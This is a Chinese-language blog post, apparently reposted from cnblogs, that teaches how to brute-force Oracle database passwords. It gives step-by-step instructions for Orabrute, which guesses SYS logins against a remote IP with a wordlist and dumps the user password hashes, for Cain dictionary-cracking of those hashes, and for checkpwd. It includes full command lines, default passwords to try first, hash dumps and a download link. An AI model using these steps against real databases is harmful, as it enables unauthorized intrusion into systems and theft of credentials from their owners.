zoukankan      html  css  js  c++  java

  • 暴力破解Oracle数据库密码的方法

    暴力破解Oracle数据库密码的方法

    一、前提条件

        要连接远程的 Oracle 数据库,需要知道 SID,用户名, 密码,当然还有最重要的 IP 地址。SID 如果被管理 员修改的话,可以利用 sidguess 来进行破解,速度非常的快,至于成功与否,就要看你的字典配置了。可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。

    二、破解方法

    1、使用Orabrute 工具来进行远程破解

    可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的
    原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。
    Orabrute 的使用方法为:

    D:/soft/oracle/Orabrute>orabrute
    Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
    orabrute <hostip> <port> <sid> <millitimewait>
    D:/soft/oracle/Orabrute>

    Orabrute 的破解速度比较慢,建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。

    D:/soft/oracle/Orabrute>orabrute 172.19.111.37 1521 orcl 2000
    Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
    orabrute <hostip> <port> <sid> <millitimewait>sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql

    NAME                           PASSWORD
    ------------------------------ ------------------------------
    SYS                            D4C5016086B2DC6A
    PUBLIC
    CONNECT
    RESOURCE
    DBA
    SYSTEM                         D4DF7931AB130E37
    SELECT_CATALOG_ROLE
    EXECUTE_CATALOG_ROLE

    2、使用Cain工具破解Oracle密码

    首先,通过SQLPlus获得用户名和密码的Hash,SQL> select username,password from dba_users;

    USERNAME
    ------------------------------------------------------------
    PASSWORD
    ------------------------------------------------------------
    SYS
    8A8F025737A9097A

    SYSTEM
    2D594E86F93B17A1

    DBSNMP
    FFF45BB2C0C327EC


    USERNAME
    ------------------------------------------------------------
    PASSWORD
    ------------------------------------------------------------
    SYSMAN
    2CA614501F09FCCC

    MGMT_VIEW
    7967E9F7D325932C

    ABC2
    2BC5EEFA22EE5E5E
    其次,安装Cain,安装后的截图如下:

     

     

    最后,利用Cain的crack功能对Oracle的密码进行字典猜解,步骤如下:

     

    第一步:运行cain,点击Craker中的Oracle

    暴力破解Oracle数据库密码的方法

     

    第二步:输入用户名和密码Hash,如:SYS 8A8F025737A9097A

     

    暴力破解Oracle数据库密码的方法

     

    第二步:点击Start,等5分钟后会发现破解的结果

    暴力破解Oracle数据库密码的方法
    暴力破解Oracle数据库密码的方法

    破解后的密码为oracle

    3、  Oracle Checkpasswd_big 破解密码


    C:/oracle_checkpwd_big>checkpwd system/wy@//192.168.1.116:1521/NBO password_file

    下载地址http://www.red-database-security.com/software/checkpwd.html
  • 相关阅读:
    LeetCode "Palindrome Partition II"
    LeetCode "Longest Substring Without Repeating Characters"
    LeetCode "Wildcard Matching"
    LeetCode "Best Time to Buy and Sell Stock II"
    LeetCodeEPI "Best Time to Buy and Sell Stock"
    LeetCode "Substring with Concatenation of All Words"
    LeetCode "Word Break II"
    LeetCode "Word Break"
    Some thoughts..
    LeetCode "Longest Valid Parentheses"
  • 原文地址:https://www.cnblogs.com/zhang20200703/p/13228695.html
Copyright © 2011-2022 走看看